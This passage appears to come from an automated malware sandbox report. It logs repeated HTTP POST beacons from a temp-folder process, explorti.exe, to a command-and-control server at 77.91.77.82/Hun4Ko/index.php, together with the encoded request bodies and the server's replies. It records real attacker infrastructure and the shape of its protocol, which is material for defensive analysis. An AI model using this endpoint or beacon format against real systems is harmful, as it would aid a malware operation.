                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      117192.168.2.44985677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:54.150269032 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:54.903615952 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      118192.168.2.44985777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:55.138588905 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:55.923649073 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      119192.168.2.44985877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:55.932749033 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:56.685010910 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      120192.168.2.44985977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:56.805891037 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:57.531723022 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      121192.168.2.44986077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:57.602402925 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:58.311515093 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      122192.168.2.44986177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:58.435015917 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:59.131618977 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      123192.168.2.44986277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:59.139991045 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:59.838681936 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      124192.168.2.44986377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:59.961623907 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:00.648771048 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      125192.168.2.44986477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:00.660785913 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:01.423053026 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      126192.168.2.44986577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:01.563683987 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:02.294905901 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      127192.168.2.44986677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:02.306555033 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:03.049221039 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      128192.168.2.44986777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:03.165491104 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:04.062906027 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:18:04.063276052 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      129192.168.2.44986877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:04.071541071 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:04.788988113 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      130192.168.2.44986977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:04.898509026 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:05.588094950 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      131192.168.2.44987077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:05.596513033 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:06.322978020 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      132192.168.2.44987177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:06.445760012 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:07.271879911 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      133192.168.2.44987277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:07.280213118 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:08.120235920 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      134192.168.2.44987377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:08.243278980 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:08.942192078 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      135192.168.2.44987477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:08.950690985 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:09.659024000 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      136192.168.2.44987577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:09.777074099 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:10.473086119 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      137192.168.2.44987677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:10.486197948 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:11.184743881 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      138192.168.2.44987777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:11.305674076 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:12.051891088 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
